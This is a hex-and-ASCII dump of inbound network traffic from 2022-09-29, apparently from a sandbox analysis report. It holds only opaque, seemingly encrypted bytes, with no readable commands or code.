                                                                                                                                                2022-09-29 12:51:55 UTC32539INData Raw: 08 7a 43 d4 f3 8a f0 6d 18 68 ab db 61 b5 bf 8b 69 d2 a7 f0 11 1b ab 89 32 b5 fa 3e d5 b2 5d 20 e3 17 4c 22 e7 83 87 59 87 be 61 80 f4 35 f4 37 21 50 10 ae 71 82 18 23 c8 70 71 1e 51 8e 6f 93 72 ed 6d 64 0c e8 39 40 be d9 77 a5 f3 44 f4 e0 89 94 83 62 bf 10 f5 17 b2 17 1c e3 e0 a3 23 04 52 9e 0e d2 fa 70 ca 05 3f 67 a6 64 66 7e 5f 37 04 d4 51 cd 6d 76 f2 ab 3e b2 88 ce 71 ea f7 9d 89 91 9d 88 7c e0 84 96 1b 17 5f 4b c4 de 5e d3 9a 0a b8 17 b2 3b 55 75 31 a8 4b ef 25 37 bc da 5f dc d7 ab d2 4f 04 b0 60 07 42 29 b0 f2 6d 2a 0f 82 d5 6d 91 fd 67 c9 bf ea 53 31 b6 77 ed a4 7c 4c 15 75 19 20 96 4d 15 37 cc 20 b1 d1 95 42 06 7e 3a 78 e0 e9 3e f4 51 ba 64 d9 e5 b2 13 b7 e5 69 1d fe d8 f3 0b a9 5d dd 3d 4e f6 9a 35 8d ba c7 af 88 b9 e0 86 89 6b 9e 88 31 1a 1d 77
                                                                                                                                                Data Ascii: zCmhai2>] L"Ya57!Pq#pqQormd9@wDb#Rp?gdf~_7Qmv>q|_K^;Uu1K%7_O`B)m*mgS1w|Lu M7 B~:x>Qdi]=N5k1w
                                                                                                                                                2022-09-29 12:51:55 UTC32555INData Raw: 71 15 24 a8 f9 c1 b9 5c 1f a0 94 f6 d0 2c 16 46 7e d1 39 1d 76 3d cd 46 48 b6 fe 66 f5 48 4e 4b e6 14 35 3c 65 2f 36 9f 64 2b 16 09 78 8d 33 fe 71 63 0b 1a 63 2c ef 64 19 5f 88 ec 05 c2 59 b1 d8 86 88 07 60 70 a5 fa 5f 86 5c 6c 38 9f 40 4a 54 13 5b 7a b0 3e 8d da 87 23 49 61 64 04 11 8d 7d ee f0 ed f8 2f 17 b0 4c 8e f9 27 43 f9 04 cb 00 4e 30 0b 27 81 58 b4 a6 b5 21 9a ee 79 25 9f 2d 25 aa 40 5e dd 2f 34 31 de 0c f7 ec a9 87 96 ec 8b 05 be 4e 13 8b a7 a3 95 1b cf cf 28 76 0e 1f 74 be a2 1a 33 8c 68 34 31 e0 1b 53 47 28 4b 97 9d 9c 35 01 4a be ec 63 bc 0b ee 85 75 39 66 e0 db fb 6f 34 66 cb d2 88 5b 01 17 15 ae e3 d2 e7 04 c0 15 2a b4 a2 e7 5c 46 ae be fc 52 e8 22 3a 79 4a 15 e6 9c 70 b9 47 ea 05 e7 92 1c 66 7b b2 85 c7 d2 37 9f 7a 07 21 37 df 97 4b 50 4c
                                                                                                                                                Data Ascii: q$\,F~9v=FHfHNK5<e/6d+x3qcc,d_Y`p_\l8@JT[z>#Iad}/L'CN0'X!y%-%@^/41N(vt3h41SG(K5Jcu9fo4f[*\FR":yJpGf{7z!7KPL
                                                                                                                                                2022-09-29 12:51:55 UTC32571INData Raw: 3c 69 f0 d6 8b 6d 67 9c 0b ab 76 90 28 19 1e cc 87 b0 02 e0 05 52 9f 25 95 13 3b e9 50 24 2d 9a ad 00 48 28 4b 98 1e bd e5 2c 79 22 ad bb 69 f7 8e 87 21 33 00 31 40 ed c6 ea 38 21 63 b1 bf 47 b3 26 f4 11 ed 87 10 54 1b 71 7a b5 ab dc 80 ea f1 78 79 a3 ff 5a e7 7c cc fc 36 bd c5 55 95 c9 47 c6 5c f8 53 34 fd e0 90 ae 93 37 16 6a ae 5e bf fd 1d 73 13 62 9d 41 80 73 8b 0d 00 8e 2a b1 01 c3 d7 f9 ca 0e a9 40 e7 93 0d d8 e2 9a cf 2f 6a bc 1f ae be 30 ee 71 35 b8 e8 8b 25 0b 73 28 39 0f 8e b8 e3 13 9e aa 44 9c d3 15 f5 4b e2 b6 eb bb 8a 92 48 ce 06 f6 b6 84 0a 32 d3 0a be 03 6e 39 ef b7 dd 8f ec 8b 97 95 2e f9 30 e6 a9 88 6f a3 48 66 e9 83 7e e6 2e 9e 10 9f cb 22 15 7f a2 76 f5 6c b5 a7 e2 4d 87 e4 09 17 25 c5 31 1a b2 0b d5 79 dd eb 6c 4e a8 e4 f1 2e 8f b4 0c
                                                                                                                                                Data Ascii: <imgv(R%;P$-H(K,y"i!31@8!cG&TqzxyZ|6UG\S47j^sbAs*@/j0q5%s(9DKH2n9.0oHf~."vlM%1ylN.
                                                                                                                                                2022-09-29 12:51:55 UTC32587INData Raw: 51 39 06 d4 65 a7 6e 62 37 cf e1 50 36 0e a8 3e f4 cd 92 5e a2 3b e9 35 06 39 f6 fe 27 15 77 17 6a b8 d0 75 5d fb 6b 95 ed 22 91 f5 26 8e 84 e4 c0 8f 28 32 87 bc ee be 65 48 5c c5 2b ae 9d c2 b1 be 10 a6 d8 bb 9d ed 9b 52 4c 1f 4b c4 6e 5e 79 3c ad 65 89 8e fa 38 0c c1 90 ff c2 fb 58 8b 7b f4 21 ae ff 9e 0c af 1a 47 2c 32 2f d3 ed 3e b6 5f 50 2a 17 1c 47 12 13 f9 16 84 17 e4 d5 82 f7 72 33 e5 29 be f7 05 e1 34 2e ea 6b 3c 80 df 33 e1 fd 74 54 2f 18 06 9f 85 5b a7 0f b9 5b 19 c8 2f 60 8f d7 20 ae 5a 93 03 fe c7 45 aa 58 45 18 22 7b cf e1 3d fc 53 af 1d 55 8d c5 24 9a 66 80 16 d9 cc be 4a ca 31 8b 54 f2 27 91 af 75 fb aa b5 7a 95 a2 8c 9e da 6b a0 52 44 a5 97 15 e7 5b df c4 d7 29 1f 91 7b 1a de 22 c6 e2 8f b1 8a ee 66 e9 f5 fb 8e 8a d7 65 62 36 2b a7 04 9a
                                                                                                                                                Data Ascii: Q9enb7P6>^;59'wju]k"&(2eH\+RLKn^y<e8X{!G,2/>_P*Gr3)4.k<3tT/[[/` ZEXE"{=SU$fJ1T'uzkRD[){"feb6+
                                                                                                                                                2022-09-29 12:51:55 UTC32603INData Raw: 8c b4 eb bf 65 c1 1c d4 3c 6b 69 7c 82 e8 9a 5b 74 d7 f6 35 5f bf 7b 66 ed cc 10 81 f0 44 64 16 cf 0b f6 63 5b 28 62 2a 76 c9 7d 01 11 c0 16 c4 b0 ee 71 06 27 40 25 b7 77 5f 55 c3 ae 50 70 89 38 83 fe 79 db cd 86 a4 54 11 25 4a be 89 1a 41 d9 db 8c 37 24 07 9a b9 b2 e6 61 56 73 0d 65 02 cf e9 36 97 2d 20 18 62 54 b3 c0 bb ed ac 4a 9e 56 07 c4 66 2e fe 50 bd f3 0b 8b a2 ff 2a 8f 39 3b 33 e4 be 75 06 74 58 48 d4 6c 8c 59 39 c4 ea 53 fa c0 77 7b 8d c9 cc e7 bb d7 b3 dd 72 7b 5b cd 51 4b 59 3d 7e 29 84 79 e9 c9 3f c9 e6 02 5f 47 52 6a 29 c6 66 86 ff ab 05 6d 53 08 95 47 76 d6 56 61 b6 45 d4 6a 50 0e c3 2f 13 df 67 f6 f8 a3 21 bf d7 0c 93 19 29 0c 04 35 7f 96 db 00 f5 7c 03 bf 5c dc 0e 98 2e 4c a0 9b 28 0b 20 44 92 0c 77 de 7f 73 62 72 1e 54 ec 34 00 31 eb 7a
                                                                                                                                                Data Ascii: e<ki|[t5_{fDdc[(b*v}q'@%w_UPp8yT%JA7$aVse6- bTJVf.P*9;3utXHlY9Sw{r{[QKY=~)y?_GRj)fmSGvVaEjP/g!)5|\.L( DwsbrT41z
                                                                                                                                                2022-09-29 12:51:55 UTC32619INData Raw: 74 e4 d9 51 25 62 a1 fa 51 bf 2c 46 d2 75 81 7d 60 d0 2a 01 83 16 d2 ab f1 a0 bd af c5 a6 ad ff 2f 30 c7 33 ec c4 0e 30 ce 5c 34 a0 a5 0c d5 12 9a 90 97 94 ae e4 34 db 05 5e 45 41 e4 45 a6 75 76 0c 9c 2b 84 b6 8f 0d ea fb 22 68 08 70 53 f4 ac 89 f5 5d 1d 94 99 bc 46 68 0a 1a d2 b3 c0 dc c6 c9 36 2b c9 59 0b ff ed 2d f8 0d 8d 6e 43 6e 53 a7 9a 46 ce 27 d2 38 54 4c 6b 18 ad 47 bf a6 7e db 06 15 e5 31 1c 0b 29 62 2b 18 b0 3c 21 9c c1 f6 46 0e 82 d0 75 ec fd 5a b7 21 05 29 81 c1 28 00 b8 f6 fb bd 59 53 82 65 56 23 d2 f4 68 38 fe 1c b5 d1 2a 49 a2 1a 14 e6 9a 40 0a 91 be 19 af 7f 1d 42 70 c3 d1 6f da 1b 16 16 4e ac b2 cb db b3 12 2e dc 85 3f c6 1e 0c 94 33 69 7b d5 5e 55 b7 83 bf a1 b7 b7 7f ec 17 60 c7 b8 2d 1f 27 b1 71 7b ae a2 59 4f 4a f0 7c 39 1d 6b 68 da
                                                                                                                                                Data Ascii: tQ%bQ,Fu}`*/030\44^EAEuv+"hpS]Fh6+Y-nCnSF'8TLkG~1)b+<!FuZ!)(YSeV#h8*I@BpoN.?3i{^U`-'q{YOJ|9kh
                                                                                                                                                2022-09-29 12:51:55 UTC32635INData Raw: 92 37 f2 7e 42 4e 9e 36 01 53 83 74 73 29 5f 19 08 8d 8d 38 17 a0 a9 9c c9 9e 67 92 dd e0 91 b9 86 cd 14 be 2a b4 7d a1 0f 24 a6 8a 64 01 b7 ac 5e 51 0c de a5 40 91 d4 44 15 52 ca 53 f5 5f a9 0e f1 8a ac 5b 5d 75 5f f3 6f 60 4e 76 64 80 1a 80 1b bc 69 03 f4 4b 0e cd 1d 11 64 be 84 c7 16 4a 8d ff a9 7e 49 2b 3d 0b f1 af d7 3a f2 20 df af 17 86 6c 0f 2a 6e bf d5 86 7c 57 b5 0d 5a b3 82 44 56 8f 5f 8f cd a5 51 5c 99 29 a5 20 34 34 a8 16 5f 18 7f 2f 60 c2 17 96 49 8d 23 ff a2 43 fd 85 97 3f 9e 77 80 80 d4 1f 50 64 36 5d 06 11 4d b0 52 3a 0e 96 38 06 02 3a 5d 45 36 b5 5c ac 21 d7 8b 02 d5 5a 68 75 16 22 ea 74 31 11 03 12 6e d6 75 27 e4 7d 8c 65 49 86 07 94 72 2b 77 06 4d 1e bb f6 d1 17 c6 1d e9 7d 11 1d c4 54 74 2b 53 61 96 56 67 e9 14 cc 62 f3 27 e8 1a e3 fc
                                                                                                                                                Data Ascii: 7~BN6Sts)_8g*}$d^Q@DRS_[]u_o`NvdiKdJ~I+=: l*n|WZDV_Q\) 44_/`I#C?wPd6]MR:8:]E6\!Zhu"t1nu'}eIr+wM}Tt+SaVgb'
                                                                                                                                                2022-09-29 12:51:55 UTC32651INData Raw: 84 97 c4 33 82 b8 9f 09 55 a7 a2 68 22 81 53 d8 bf 67 dd ac 0b b7 6a 7d 60 37 1f e0 bf aa 64 5e b0 b5 47 82 cd d2 b1 91 96 a8 5f d8 0a ed a2 88 4a 2b 04 3b 9d 95 09 9d ce 1c 22 ed 68 c6 69 01 4f b3 c2 a4 bd 0d 59 d1 a4 f2 48 1a a2 2b 03 0d 10 90 23 a1 fc 9c 98 d7 27 bf f3 e4 42 94 1a 6f a8 c7 b9 e9 f5 26 6d 84 dc ba e1 2a a7 73 76 b5 eb 2f c4 cf a3 e5 bd 8a 5c 68 f5 9f a9 43 9a dc 04 2e 90 a8 d6 e3 81 01 54 41 a8 62 d1 2e e4 4e 35 81 ea e8 44 7b 69 5c 5f 16 44 52 ba ad 50 be e0 97 c0 8d 1a fc fe 3e 27 02 a5 16 3c 2a e1 49 4f ac 8c 35 da 66 08 89 19 5d 5e b5 c7 8d 91 ec 8e 22 c3 df f1 0c c9 44 ba 8b 3a 46 c2 25 3b 19 1d 36 8a 40 44 43 e7 89 e2 5c 17 23 27 62 2a c6 31 74 62 9e da 07 f4 a7 e5 8f 95 d2 4b 69 2d e3 50 00 e4 aa 2f 61 3e 02 b1 2c 54 1e 0e a4 56
                                                                                                                                                Data Ascii: 3Uh"Sgj}`7d^G_J+;"hiOYH+#'Bo&m*sv/\hC.TAb.N5D{i\_DRP>'<*IO5f]^"D:F%;6@DC\#'b*1tbKi-P/a>,TV
                                                                                                                                                2022-09-29 12:51:55 UTC32667INData Raw: 29 34 5e 73 8b fe 22 c6 89 42 16 d3 f8 c8 6d f8 f1 d3 5f b8 64 de 31 48 d8 46 b9 ce 88 e1 82 32 64 9d 05 de e1 c8 e7 a0 04 ae 34 5e 78 53 1f 59 23 ff 4f 60 50 9b 31 81 bc fe ab 50 64 e8 f4 33 66 e4 22 1d 67 bb 04 6c 62 76 06 a7 83 76 aa 4f dd f3 3e c6 c3 88 cc 4e b5 5f bd d4 0f f0 80 71 6d 0e 88 5c 6f 0a 4f 91 8d 90 85 c7 4f 64 2b 9a 01 ca 36 88 c7 da c5 2c 13 c8 42 59 8e 58 a6 25 be 11 b5 49 a3 bd 4e 3f f1 26 05 7a 8e a6 16 ed fc 9a 9c fc 3e 58 b9 ca b4 87 e0 4d fe cf 85 18 85 3f b6 11 ef f4 fb b9 40 0f f1 3a 3a d9 9c 5d 30 f1 d5 04 15 67 23 59 fd 39 b1 bc f9 ae 66 7f d7 8b 2a 11 a5 d6 76 7a 6f 3f 79 9a b2 1b ae b8 72 b9 c4 ae e7 77 5b 50 6e 47 a9 2b 56 83 6f 34 56 68 d3 c8 b9 14 0f 95 13 75 8b 5d db 41 17 32 d5 c9 99 bc fc 05 56 0c 32 22 77 69 ed 4e 58
                                                                                                                                                Data Ascii: )4^s"Bm_d1HF2d4^xSY#O`P1Pd3f"glbvvO>N_qm\oOOd+6,BYX%IN?&z>XM?@::]0g#Y9f*vzo?yrw[PnG+Vo4Vhu]A2V2"wiNX
                                                                                                                                                2022-09-29 12:51:55 UTC32683INData Raw: 6b 93 3e 3a bc f2 3d ab 1b e4 e9 7c b0 ef e9 96 6a 08 e3 74 4d c5 f2 ec ec e5 e8 4d e6 92 a3 06 d3 f5 ab 0d 00 eb 73 78 73 a7 f9 72 a7 ba 65 04 32 08 e0 15 50 f1 72 a0 f9 f7 ae 84 1c 65 9a 42 ee 2e 99 c8 48 1c 93 f5 a7 55 bb 66 98 7b 2d d5 f2 ae c0 71 4d dd 26 97 47 f0 3b cf 52 6f a0 50 97 63 3f 1a 74 bb 81 b1 dd 04 cc b3 bf b1 a7 6c 1f bd fb c4 a1 f5 c1 83 e7 e8 78 cd de 0f 15 02 07 99 fe 19 dc b4 53 05 df 72 1a 35 bc 9b 39 ac 95 fa b1 b2 58 28 40 10 62 98 71 1d e6 05 bb d3 44 de bb 4a ca c1 3e e5 4b 14 68 38 f1 34 e3 d7 10 73 4d d8 cf 70 14 c4 5d 75 96 5d 2c a0 5b 05 d1 56 6b 1c 67 e5 68 9f cb 35 06 5d dc 70 af 1a 58 ad 65 25 27 f2 36 b1 40 96 ec 37 78 fd aa 23 8d 3e 8b f9 62 9a aa 21 86 97 00 a9 a5 f1 f3 ee 11 eb 79 9e 06 d8 69 2f 59 34 d0 92 ba dd df
                                                                                                                                                Data Ascii: k>:=|jtMMsxsre2PreB.HUf{-qM&G;RoPc?tlxSr59X(@bqDJ>Kh84sMp]u],[Vkgh5]pXe%'6@7x#>b!yi/Y4
                                                                                                                                                2022-09-29 12:51:55 UTC32699INData Raw: 68 05 1a c4 39 52 15 2f c8 1e 61 39 7c 79 b1 58 d4 4b 23 4d c7 80 26 8c e6 d3 b3 85 c7 3e cd fb f3 fc df 10 81 0d 43 2c bb bc 5c 6e e0 47 09 bd 41 96 44 17 44 c1 dc 28 cf 1b be 6b 9e 60 e9 8b 8a 8f 6d d3 b5 94 dd b0 22 72 70 ea 21 bf 86 05 39 cc 5b 83 b5 d5 74 7e ec 97 e6 59 e0 e8 fe dc 22 2a e7 f6 6a 4b ef 85 3f 26 6e c9 3f 1f 63 03 94 09 07 3d ea b9 46 d8 37 83 db 8c 38 dc 43 cd 1a 30 d3 51 c4 8f 63 1b 68 d9 26 0e d5 65 51 4a 9c 7d a2 ba d6 29 0c 61 83 22 0d c5 71 7f 1d 76 33 24 27 f1 0d 6a f4 fa 47 83 7e 17 6b 51 74 6d a5 e8 23 50 5c ee 26 ed 0f 1a e9 ad f0 bf 1d 16 88 d6 5a 22 55 e9 90 46 e8 86 0b d6 46 af 77 79 fe e6 9a 2c 4e 4b c8 83 94 2d b9 69 a2 09 0d 50 ae d2 42 98 ca 2b 6a 1f ab 61 3a d1 15 f7 52 29 25 27 a2 97 31 21 5f 24 11 1b a2 a4 25 83 9c
                                                                                                                                                Data Ascii: h9R/a9|yXK#M&>C,\nGADD(k`m"rp!9[t~Y"*jK?&n?c=F78C0Qch&eQJ})a"qv3$'jG~kQtm#P\&Z"UFFwy,NK-iPB+ja:R)%'1!_$%
                                                                                                                                                2022-09-29 12:51:55 UTC32715INData Raw: 3a bc 2a 8b a6 2e fa ef 94 a0 a9 6e 95 b6 d7 56 f3 66 a5 fe 02 58 01 99 0f 68 57 1a 6a 82 11 87 a9 76 39 05 f0 14 c8 cd 12 8e fe 99 42 8f f3 03 29 a0 01 f2 5b a5 40 f6 64 44 74 05 30 36 ea 24 6b bb 7d 7b 68 00 fa 34 80 04 db 51 40 9d 66 cd 77 8f f0 72 82 d3 9c 83 44 bd 41 10 26 05 33 6a 3f 79 99 58 cc 65 96 88 24 89 21 e2 57 80 44 bf 02 96 84 9e ea 88 f8 83 54 e3 78 53 e2 46 85 15 29 cf 22 b5 96 fe 56 d2 77 1a 35 dd 02 41 50 61 cb e1 40 03 d5 d3 e8 b3 01 1c f3 e9 d9 de fb c8 21 1f 7c 08 58 8f dd 2a fd 1b 49 0e 14 28 22 b2 64 44 ae 5c 94 3c 0f c1 6c 10 81 56 a3 d1 21 2b 28 2b 16 d4 6d db 80 2d 70 29 15 e5 5a a4 18 74 4e 15 39 0b b0 59 2a 9f 1e 0e d5 17 48 e4 fd e4 2e e3 75 88 e3 11 b9 0f 26 de 5c e5 0c 2b 3f eb 16 ac df f5 6b fd 86 62 4c 1f 10 5d 48 75 d8
                                                                                                                                                Data Ascii: :*.nVfXhWjv9B)[@dDt06$k}{h4Q@fwrDA&3j?yXe$!WDTxSF)"Vw5APa@!|X*I("dD\<lV!+(+m-p)ZtN9Y*H.u&\+?kbL]Hu
                                                                                                                                                2022-09-29 12:51:55 UTC32731INData Raw: 10 22 84 a9 1d 05 29 bf 89 40 36 2d 9c 2d c7 6c 25 22 5c e6 65 db 0e c8 e0 f5 a0 6d e9 b6 83 68 a1 61 0f de b4 2d a2 38 f5 9d 15 d7 cf 96 22 44 85 db f7 ea 9b a4 91 e1 6e e0 9d 54 86 27 6f 21 2c 92 78 c7 f5 03 77 73 87 78 df 24 04 82 19 03 04 dd 44 41 71 f7 28 89 d5 e6 18 2d 97 9c b3 cb b6 02 1c a3 08 b5 df 0b 9a 99 b5 fe 48 1b f1 1c 03 5d bd 40 fd 39 8c 93 56 2b e9 ea 9f 32 c8 64 53 cf 1b 10 68 23 56 a7 5f 7a 4b 96 11 ed ff 9d be bc 4f 73 51 18 43 d4 fd e7 26 6e dc 8e 9d c3 4b 18 e8 2b c2 d9 38 e4 7c 70 f7 99 40 00 d4 be d2 08 21 bf 04 6b 49 51 45 8a 31 1d e3 4b a0 10 c2 b9 1d 43 94 05 40 33 43 71 ca 1f f3 75 5a 93 2a 56 75 62 66 f9 8d 90 f9 c3 86 c7 46 89 39 e7 05 d6 dd 81 c7 44 52 b8 60 3c f4 64 48 be bd e5 10 2c 14 f7 4e 8e 54 32 f7 a7 d1 25 32 e7 df
                                                                                                                                                Data Ascii: ")@6--l%"\emha-8"DnT'o!,xwsx$DAq(-H]@9V+2dSh#V_zKOsQC&nK+8|p@!kIQE1KC@3CquZ*VubfF9DR`<dH,NT2%2
                                                                                                                                                2022-09-29 12:51:55 UTC32747INData Raw: 8b 10 b0 5d 8e c9 2b 3d ab 5f 90 61 64 80 a5 d5 66 9e b1 7c 51 be 23 60 d3 57 ce ca a9 95 9d 96 cc ae ee de dd ce 95 fc 2b 1e ac 10 1e f3 49 cf 87 ea 95 4e 03 c3 e2 50 23 da d0 28 6f fb f6 9f 97 6d a9 8e ca 26 7f 5d e5 bd 96 a2 37 b3 12 a4 f9 ea ff 6f 20 c0 b7 33 eb 02 95 c5 29 02 6f 97 d3 5a 57 07 b5 b2 27 a5 a6 92 c5 fc 01 06 8d 16 43 d4 33 e9 a8 9c 5d 36 04 94 3e 08 c0 64 08 80 d7 a4 4b 42 6d 20 6b 0b 98 0e 8a 86 f0 25 fe c5 50 c9 05 f7 82 7e 0d ad f4 52 cd 29 85 b5 98 3d 4b cd 1b 17 a3 ce 3d 24 d0 0b 4c c2 09 eb 41 5b 58 17 f6 25 8a 6d 4b 3d 79 f5 a6 05 97 5d 14 66 42 7e 9f 62 57 3c 47 3f 43 25 cd 42 af a8 a8 e3 29 6e 8d 49 5b c4 dc c4 85 4e a2 6f 0b 02 bf 15 e3 99 4d 91 e6 59 2b 8e 99 26 55 25 7b c2 7f 22 43 88 60 f2 43 e0 89 c7 cb 5f 17 ff fd 72 f1
                                                                                                                                                Data Ascii: ]+=_adf|Q#`W+INP#(om&]7o 3)oZW'C3]6>dKBm k%P~R)=K=$LA[X%mK=y]fB~bW<G?C%B)nI[NoMY+&U%{"C`C_r
                                                                                                                                                2022-09-29 12:51:55 UTC32763INData Raw: 9a b9 b5 63 68 e2 97 64 a8 6c 88 5a a5 cf 85 8c 3b 1d e3 7b c8 3e 6f d0 68 a5 4d cc 8f c8 d8 dc 92 4e 12 76 e3 58 57 2b 36 3b 29 ee 59 e7 20 77 16 43 e1 89 fd bb 6e 22 3b 86 af 7b 19 71 15 fe 0a 73 a9 06 7f a5 04 a9 2f fa c9 d0 92 71 28 ff 7e 6e fe 1c d1 cc 80 7c 30 b0 92 46 40 d0 89 ed 32 98 e4 1c 8e d0 76 44 cf ea 34 50 b5 7a b7 3a 08 e9 72 9f 7b 92 90 b2 03 45 da 94 33 89 17 23 36 3a 60 8a 8f 8a 5b 73 e4 f2 6a 31 7f 1b 36 11 29 22 e8 e7 13 3a 1d 98 60 6d fd 81 39 fe ac 8c 14 49 b3 c0 da 92 4f 58 f6 ae 6d f9 5a d9 36 a2 74 10 ad c0 1e 34 e6 fa a2 01 32 cc 6c e3 da 8f 35 a9 8a 9e 37 df 27 dd 7b 14 75 ca 05 d8 45 a4 1c 5d 4d 44 ed 30 e8 d8 d5 1e c2 1c 11 db aa 3f 0f d3 db 19 04 3c 32 96 36 a3 eb d7 33 56 b2 20 71 d1 d6 31 0b 3a 24 e7 c3 1a 2c b6 b1 41 8d
                                                                                                                                                Data Ascii: chdlZ;{>ohMNvXW+6;)Y wCn";{qs/q(~n|0F@2vD4Pz:r{E3#6:`[sj16)":`m9IOXmZ6t42l57'{uE]MD0?<263V q1:$,A
                                                                                                                                                2022-09-29 12:51:55 UTC32772INData Raw: 93 6e 85 d8 03 32 52 4f 26 47 0a 89 5a 05 69 43 92 61 70 f5 8b 85 b5 08 42 c5 0f 3c 41 c3 8b 45 1a 1b ca b3 a1 0f a0 e8 f5 9f 92 97 0c 7c 65 ab 35 e5 0e 71 54 14 bc c8 f2 4b 1b b2 08 ff d9 d7 8f 93 b5 43 67 eb 62 77 1c 15 15 2e 4a 5d ff 0d 2e a3 b2 4d 9b ca 00 65 fe 0f da e0 ea b2 78 eb 9f 6b ce cc 11 53 df 68 35 d5 ed d7 6d b3 4f f1 5b aa 48 92 85 56 46 85 4b 0f 54 f1 d2 7d 61 de 12 79 d8 2a 00 61 b9 3d 31 e7 dd 3c 0e 7c dc 6c 2c ba 97 20 de b1 a0 a1 55 c8 c6 73 ff 40 63 f5 93 d2 c0 b8 56 f2 84 f3 98 a4 a6 81 68 24 14 02 a3 9c e3 11 56 9a 72 69 96 9d 1e 89 cf 27 04 1c 2a 1b b4 98 6c fb 0e b1 17 63 97 af 03 8c 97 63 b3 73 91 02 a8 d9 90 7a 15 f5 4b 7b f4 fe e3 0f 05 05 25 26 0b a8 2e 52 d3 e9 36 1a c2 d1 5b 67 ac 07 4f ec 1c 87 87 45 07 e5 d0 6e c3 e5 7e
                                                                                                                                                Data Ascii: n2RO&GZiCapB<AE|e5qTKCgbw.J].MexkSh5mO[HVFKT}ay*a=1<|l, Us@cVh$Vri'*lccszK{%&.R6[gOEn~
                                                                                                                                                2022-09-29 12:51:55 UTC32788INData Raw: 6d bc 09 43 f2 82 10 13 41 fc 87 40 2d 7c eb 8c 36 4b 93 16 a6 f6 4c ef 9f 18 ae 58 03 e8 cc 7a 2e 5f 28 d5 42 c0 4a ff 92 b0 13 36 f8 64 ee 86 6c e9 4d 85 cc 80 bb 47 a3 b2 fa 70 ec bd b0 6d 13 03 f4 80 6c 39 dc cc 5f 10 e1 2f 09 4b 67 f2 1c 2a ac cc 62 93 d3 b2 a6 3b dd 3b f3 d7 4c 68 3a 2b 63 18 ba fd fe f5 bf 6c 9a 93 29 ea 0a 61 89 06 75 84 ac 3e 43 f5 df 55 38 f4 75 73 00 6e 27 c7 22 40 b6 5e 0a 51 9e c9 c1 9c 0a 30 87 9b 98 50 90 4b 2c 12 74 f9 63 32 05 a8 99 2e cf fd 96 a8 3d 90 87 83 28 09 78 3f 20 1c 27 89 21 0d b7 a0 a2 7c 7d cc 8b e6 2a 40 6f e3 c0 61 48 79 14 13 c4 1e 1c d9 95 72 de 70 db 1f 71 30 6d bc 19 75 2d ed 15 d2 60 6c 81 80 37 01 f8 73 b3 a4 62 92 26 e3 f7 9f e3 ba 02 af 23 20 66 af 3f 57 5c f9 86 01 90 a3 b2 c7 1c ad 2e 5b ae 00 d2
                                                                                                                                                Data Ascii: mCA@-|6KLXz._(BJ6dlMGpml9_/Kg*b;;Lh:+cl)au>CU8usn'"@^Q0PK,tc2.=(x? '!|}*@oaHyrpq0mu-`l7sb&# f?W\.[
                                                                                                                                                2022-09-29 12:51:55 UTC32804INData Raw: 39 82 e7 f1 b2 1e 64 e7 4f 1e ed 37 75 fa 5a c5 c3 73 55 50 5d 3d 8d 08 62 6b 75 34 dc 63 54 32 2f 31 28 03 9d cc 1e 2c 8f 4b c1 29 03 28 05 8b 49 bb 16 c7 91 6e f7 e8 5d ef 0c 8a ac bf e7 27 68 cc 23 f6 77 88 73 fa 29 79 d3 06 4b 71 41 92 9b c1 d6 2f ff 73 d9 e1 60 13 ce 81 e6 b2 1d 91 a4 4b 9f ab 24 c5 a9 fd ad 7e 22 d5 a6 07 8e af cc 33 00 f6 d1 8e 98 a1 16 f2 a3 72 ed 17 4e c6 dc 3e 7d 40 ff bc 50 20 50 6f 9e 15 7d 88 0a a4 f7 33 ed 68 55 88 8d 71 d1 11 8b dc 56 5a ea 5f c3 f5 48 e5 07 37 5c 4d 7f 37 d2 73 e2 84 32 f8 26 20 79 e3 12 bf a5 d4 7c 94 9f d3 84 d4 c9 4a 46 21 bf 90 07 a4 f4 48 c2 e5 3e 94 1a de 2c c8 ea 6b 93 51 bf 2d 97 eb 5c 26 e6 43 9a 95 ee 98 b4 6b b5 a5 c5 29 89 a5 11 b8 e0 9f 99 39 de f3 d7 c7 38 17 08 26 73 cf 22 88 2f c6 cc 96 3b
                                                                                                                                                Data Ascii: 9dO7uZsUP]=bku4cT2/1(,K)(In]'h#ws)yKqA/s`K$~"3rN>}@P Po}3hUqVZ_H7\M7s2& y|JF!H>,kQ-\&Ck)98&s"/;
                                                                                                                                                2022-09-29 12:51:55 UTC32820INData Raw: 44 16 b5 8f 7c 92 2b db 29 22 de 8e e7 83 09 1e 48 ff 98 26 5c 9e d4 a1 8a e9 1b f6 3b 41 67 9a 59 45 fd 35 4d 26 e0 a2 39 a0 2d ed 70 56 6d 3d c5 49 bb 31 5f f0 8b 68 69 fb 5e 10 d3 1b ad 69 29 e1 77 64 a1 4c a4 38 e6 5b d7 83 33 0f e7 75 2d 0e ed 7f 7e c7 03 a7 68 ed 26 fb 7c 70 52 7e 2f d6 3a 9d 57 77 4d 5b 99 f6 3a 39 a7 a9 a1 bd ed ef 29 52 e9 c0 e9 14 c7 e3 83 02 23 eb 46 49 0c 4a 81 57 bb c5 c2 af 06 53 4b 8b ae c4 10 d8 76 b1 c2 d8 3a 25 08 82 00 36 82 85 d6 09 68 45 f1 c4 6f e9 0b 4b 8b 07 7d 18 27 bb ee 1d d1 e4 74 cc ca 95 0c 8a db d4 d7 20 2c f6 40 0a 59 c1 a3 9d 4a 20 b9 da 09 6a 49 09 fa 76 97 ef 0a 49 80 45 97 b8 40 62 7e 4b ec 23 e9 cd aa 38 6e 07 40 c3 c4 4c 60 c7 b9 ce 99 da 57 74 e4 87 0c 1c 32 63 c1 df 3e f1 87 f1 56 ce 77 7e c1 53 07
                                                                                                                                                Data Ascii: D|+)"H&\;AgYE5M&9-pVm=I1_hi^i)wdL8[3u-~h&|pR~/:WwM[:9)R#FIJWSKv:%6hEoK}'t ,@YJ jIvIE@b~K#8n@L`Wt2c>Vw~S
